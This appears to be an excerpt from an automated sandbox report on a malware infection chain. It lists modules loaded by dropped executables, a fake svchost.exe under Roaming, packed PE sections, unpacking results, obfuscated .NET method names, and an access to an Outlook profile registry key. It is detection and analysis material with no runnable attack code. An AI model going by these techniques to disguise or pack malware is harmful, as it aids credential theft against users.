                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: webio.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: mstask.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: dui70.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: duser.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: chartv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: oleacc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: atlthunk.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: winsta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: windows.fileexplorer.common.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: explorerframe.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeSection loaded: profapi.dll
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: Google Chrome.lnk.11.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                Source: mlk3kK6uLZ.exeStatic file information: File size 1880576 > 1048576
                                Source: mlk3kK6uLZ.exeStatic PE information: Raw size of lkmvftub is bigger than: 0x100000 < 0x199a00
                                Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000014.00000002.2837675015.000000006C0CD000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: ntdll.pdb source: build16666.exe, 00000015.00000002.2732029264.000001662AFE0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729447807.000001662A1E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730244326.000001662A7E9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730481150.000001662A9EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729986189.000001662A5E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2731462760.000001662ADE9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730926078.000001662ABEF000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2742546399.000001662CBE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735116835.000001662B9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729694439.000001662A3EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2739098908.000001662C7E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2737730487.000001662C3E6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2738483590.000001662C5E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734502417.000001662B5E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736372776.000001662BFE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2728871110.0000016629DE1000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729156228.0000016629FE6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2743279212.000001662CDE7000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2740303581.000001662C9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736774582.000001662C1EA000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735601672.000001662BBED000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735992123.000001662BDEE000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2733319304.000001662B3EC000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734791719.000001662B7E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2732670905.000001662B1E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntdll.pdbUGP source: build16666.exe, 00000015.00000002.2732029264.000001662AFE0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729447807.000001662A1E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730244326.000001662A7E9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730481150.000001662A9EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729986189.000001662A5E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2731462760.000001662ADE9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730926078.000001662ABEF000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2742546399.000001662CBE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735116835.000001662B9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729694439.000001662A3EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2739098908.000001662C7E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2737730487.000001662C3E6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2738483590.000001662C5E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734502417.000001662B5E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736372776.000001662BFE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2728871110.0000016629DE1000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729156228.0000016629FE6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2743279212.000001662CDE7000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2740303581.000001662C9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736774582.000001662C1EA000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735601672.000001662BBED000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735992123.000001662BDEE000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2733319304.000001662B3EC000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734791719.000001662B7E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2732670905.000001662B1E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000014.00000002.2837675015.000000006C0CD000.00000002.00000001.01000000.00000018.sdmp

                                Data Obfuscation

                                barindex
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeUnpacked PE file: 0.2.mlk3kK6uLZ.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeUnpacked PE file: 2.2.axplong.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeUnpacked PE file: 3.2.axplong.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lkmvftub:EW;ajmdtwbz:EW;.taggant:EW;
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeUnpacked PE file: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pngezuyu:EW;jnurgezm:EW;.taggant:EW; vs :ER;.rsrc:W;
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeUnpacked PE file: 42.2.svchost.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pngezuyu:EW;jnurgezm:EW;.taggant:EW; vs :ER;.rsrc:W;
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeUnpacked PE file: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeUnpacked PE file: 42.2.svchost.exe.1b0000.0.unpack
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, yBQYZwZvTcsA2wxVsly.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{txAQQmLiQCLZcg3ftF4(typeof(IntPtr).TypeHandle),typeof(Type)})
                                Source: Z73fDV6g4L.exe.5.drStatic PE information: 0xFCFF54C7 [Fri Jul 4 05:16:55 2104 UTC]
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: Z73fDV6g4L.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x66cc2
                                Source: axplong.exe.0.drStatic PE information: real checksum: 0x1cb4a0 should be: 0x1d255b
                                Source: mlk3kK6uLZ.exeStatic PE information: real checksum: 0x1cb4a0 should be: 0x1d255b
                                Source: VP2pdCInvS.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x4e2a0
                                Source: leg222[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0x125d70
                                Source: leg222.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x125d70
                                Source: mlk3kK6uLZ.exeStatic PE information: section name:
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: .idata
                                Source: mlk3kK6uLZ.exeStatic PE information: section name:
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: lkmvftub
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: ajmdtwbz
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: .taggant
                                Source: axplong.exe.0.drStatic PE information: section name:
                                Source: axplong.exe.0.drStatic PE information: section name: .idata
                                Source: axplong.exe.0.drStatic PE information: section name:
                                Source: axplong.exe.0.drStatic PE information: section name: lkmvftub
                                Source: axplong.exe.0.drStatic PE information: section name: ajmdtwbz
                                Source: axplong.exe.0.drStatic PE information: section name: .taggant
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009DD82C push ecx; ret 2_2_009DD83F
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AAB328 push ecx; ret 4_2_00AAB33B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00428E7D push esi; ret 5_2_00428E86
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004076E0 push ecx; ret 5_2_004076F3
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_02C816F8 push edx; retf 9_2_02C81701
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0639ECF2 push eax; ret 11_2_0639ED01
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C39B964 push ecx; ret 18_2_6C39B977
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C3BB5F5 push ecx; ret 18_2_6C3BB608
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: entropy: 7.9863934450517355
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: lkmvftub entropy: 7.953235940244863
                                Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.9863934450517355
                                Source: axplong.exe.0.drStatic PE information: section name: lkmvftub entropy: 7.953235940244863
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, auIWlxlNKk3ogEo6Qsq.csHigh entropy of concatenated method names: 'bpRO74lhUJ', 'P7jOCpSA1a', 'vrgXZwWwlfcnllUUvjg', 'VuJS9nW4sDwAaP79JWP', 'B9rucnWDcP6ttpSKWS2', 'QQaljFL6ib', 'gBGlynsFOD', 'PvelkoKhfT', 'WqDl05uQBq', 'IOllu3a29a'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, JpaSaQgsNJQtdUCL4Ja.csHigh entropy of concatenated method names: 'NNEZ2koQG8', 'muxZQ06ri2', 'VhXk81WmZ5KwrOv3PKF', 'm2atlHW1UVcJF2wTEQW', 'GnI9YEWUFHMfYZZnUfH', 'QQaigAWisemX3hKna2s', 'IuxZuYW5qmUHUlAUJxA', 'CmOKlIWvU6Bv5VItSXc', 'IOrg7OQY2f', 'lRAgCZN3Xo'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, t4L8uckeoJkcJSI8KUe.csHigh entropy of concatenated method names: 'm5PkbpTBob', 'IcOkWPI2nv', 'nvlkwxwcJB', 'y8Sk4eEGTv', 'hjfkKBxjYi', 'WDbk1rqLrA', 'XOFkUvj6NF', 'ToString', 'HkNU6Fbl9XxxoD01CFJ', 'ysIn8lbJCQohtZow4nL'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, WaEOYJbfiqNn8QyPW0.csHigh entropy of concatenated method names: 'Field1', 'bAgo3QomCAQoa48aBMf', 'WOSiDIo1bPLksWB1pQ4', 'Nt1T9VoUSkEYBYPyV0M', 'QROvDfoiQ1AYY6thHdD', 'xhWdDbo52QXcQHcL88W', 'hOr6xqoDDB71jWtD9Cs', 'W2HR8eoKqhFJcVmnvVm'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, CUtxwWl25ktuQYjjngu.csHigh entropy of concatenated method names: 'H3qlnfaRlu', 'Si5loBnSNK', 'QsulrWaU8D', 'AsClhpNfnY', 'E5WlTneead', 'Im4leLqlXs', 's0hla8tlcQ', 'nBhlbJsHD0', 'Wc0lWZk2BD', 'peIlLMd3q7'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, hqABaNAmrht1DdWxZdy.csHigh entropy of concatenated method names: 'vQvZhgp69c', 'n8wGrnWF3bHFT2QvH9K', 'PhE09jWXihtswpb9uRw', 'a6NZeIvcVQ', 'w09ZaNDMGO', 'k0qZbyZtmT', 'V3XZWu47o4', 'exRImDWs7CPeU8GK9bG', 'kf4F3UWt5yKRfFwFCH0', 'L1KW03W73wsQv3Bewor'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, aPPk1Zdr12J893q06eJ.csHigh entropy of concatenated method names: 'Rd7dW8VFnv', 'TjDdwfGP9h', 'bxadDFcfxj', 'EaSdmVCaSc', 'EogdUhD5Bg', 'NNkdii5cDw', 'YDLdvDmK56', 'rWqdGFa5Tr', 'tMhdTqgl9f', 'YofdeOFdAY'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, Um4kXl0g3Qv4NjNPnk.csHigh entropy of concatenated method names: 'B0Gf7u5icx', 'J9ofCylOp6', 'Atmf8r2i78', 'DN3fzwXidR', 'lIIIBXcXil', 'tUGIHOAL3H', 'MnYISZ4UP7', 'lxlCJTbTdZ4wjH8AdGv', 'lEiC4ObeBDuNufPSN9i', 'GhCIJNy1ur'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, yBQYZwZvTcsA2wxVsly.csHigh entropy of concatenated method names: 'OGFNvXwjcPUPXu4rKF6', 'n13RCuwyEk6lTXM23iD', 'KaRYxc2y20', 'bN7nTTwfcfIGrm7wUwO', 'B4OfC1wI7Km6RhEPppC', 'sLoMgQwOXZO8yr0Ojtk', 'QqBIJpwZZsOmfPCMsgO', 'KxIR60wPyCGepJkh9pM', 'a2sZ0bwYUdfGx2PKEZv', 'g38PJ8K3c0'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, lALDbllf8eOCobfXRcP.csHigh entropy of concatenated method names: 'OfglOEfaiK', 'KV6lZCyi5N', 'mlxlPAqbJr', 'JpRlY7lwNx', 'wpolxcGNTE', 'TfDlMTM2Pl', 'BvClq7Rx9p', 'j75lpv2lZy', 'U54lE6vCTY', 'sb3l90kQII'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, JHGyrdymnxS4EO1VHnT.csHigh entropy of concatenated method names: 'Dispose', 'HtWSWkaDFyBwxRk7mmP', 'wTCrhWaKMvI5D8MWje3', 'Idp9llaw5Rj82ZT5Xk5', 'xEYHLxa4uN0TvO8ZLVk', 'WDPExYamBGu2eC0cOgU', 'Lcq2x2a1j2Ae0TqTgCj'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, fVlr6sEKd284e89L5b.csHigh entropy of concatenated method names: 'Field1', 'zeGcocb6q', 'Field2', 'Field3', 'oov3trV3H', 'C3HReJFF1', 'AbG2g3Dgr', 'DG5YwAoxCb9BrwrjRmN', 'hvQe1roM8Ofk9camEtp', 'ECtibSoPWZB97qrVjFI'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, UUlixHJLb0pbpHf1CpI.csHigh entropy of concatenated method names: 'zXExkTXhx9', 'TT8xx0fPCk', 'D5bJ4kax4y', 'qEgJDHRlxI', 'PPxJKL1xJS', 'Cq8JmfQhG3', 'kSrJ18ydUp', 'AS9xjNbiDS', 'TVix0jhbdv', 'sSHxMInHJg'
